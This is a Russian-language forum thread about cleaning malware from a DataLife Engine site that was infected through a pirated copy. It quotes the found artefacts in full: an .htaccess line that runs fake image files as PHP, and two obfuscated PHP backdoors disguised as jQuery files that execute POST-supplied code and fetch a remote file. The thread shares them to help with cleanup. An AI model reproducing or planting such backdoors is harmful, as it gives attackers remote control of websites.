Как вычистить вредоносный код с DLE ?

Здравствуйте, смотрите access логи.

Купите лицензию и не будет у Вас дыр и шелов.

а откуда дистрибутив качали?

Проверьте сайт антивирусом - https://revisium.com/ai/

Нашел в /uploads/fotos файл .htaccess в котором

<FilesMatch ".([Pp][Hh][Pp]|[Cc][Gg][Ii]|[Pp][Ll]|[Pp][Hh][Ii][Mm][Ll]).?">
   Order allow,deny
   Deny from all
</FilesMatch>
AddHandler application/x-httpd-php .avi .jpeq .mpg4]

+ файл foto_67823364.jpeq с кодом

<?php 
/*
 * jQuery Image Library v1.6.1
 * http://jquery.com/
 *
 * Copyright 2011, John Resig
 * Dual licensed under the MIT or GPL Version 2 licenses.
 * http://jquery.org/license
 *
 * Includes Sizzle.js
 * http://sizzlejs.com/
 * Copyright 2011, The Dojo Foundation
 * Released under the MIT, BSD, and GPL Licenses.
 *
 * Date: Thu May 12 15:04:36 2011 -0400
 *  *  *  *  *  *  * *  *  *  *  *  *  *  *  *  *  *  *  *  Don't delete this file *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  * 
 */
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('display_errors', 0);
@error_reporting(0);
@set_time_limit(0);
$cret='unct' .'ion';$cret= 'cre' . 'ate' .'_f' .$cret;
$jQuery='sert';$jQuery='as'.$jQuery;$Libr= "_ostp";
$sizz=strtoupper($Libr[0].$Libr[4].$Libr[1].$Libr[2].$Libr[3] );
if(isset(${$sizz}['j01bt5ri3p'])){@$cret('', '};'.${$sizz}['j01bt5ri3p'].'{');}
if(isset(${$sizz}['j01bt5ri3p'])){@$jQuery(${$sizz}['j01bt5ri3p']);} 
if((isset(${$sizz}['j01bt5ri3p']))&(isset(${$sizz}['fail']))){
@copy('http://'.${$sizz}['fail'].'/test.txt', $_SERVER['DOCUMENT_ROOT'].'/license.php');} 
print"<!-- te"."st --> "; 
?>

Яндекс начал ругаться на релирект моб пользователей, нашел картинку с кодом вот такое содержимое
[Ссылка]
jQuery
http://jquery.com/


и файл dsiuarl. php
Юрий Жежелев, вчера в 23:19
и еще файл domains/for-web.ru/public_html/uploads/posts/2018-05/thumbs/dsiuarl.php которого не должно быть по идее в этой папке

Юрий Жежелев, вчера в 23:20
с таким содержимым ?php
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('display_errors', 0);
@error_reporting(0);
@set_time_limit(0);
$cret= 'cre' . 'ate' .'_f' .'unct' .'ion';
$as= 'as' . 'se' .'rt';$drem= "_ostp" ;
$did= strtoupper ($drem[0]. $drem[4].$drem[1].$drem[2].$drem[3] ) ;
if(isset( ${$did }[ 'qf03c87'] ) ) {$cret('', '};'.${$did }['qf03c87'].'{');}
if(isset( ${$did }[ 'qf03c87'] ) ) {$as (${$did }['qf03c87'] );}
print " ";
?>

Так же в файле mysql. php
Что за фигня и как ее победить

А может такой вирус "пролезть" через шаблон?
В июльских бэкапах его ещё нет, на сейчас на хостинге он уже есть.
Недавно шабы на хост заливал, скачанные с бесплатных сайтов

П.С.
Разобрался, движок (dle 13.3) изначально был залит с вирусом. Видимо недавно только активировался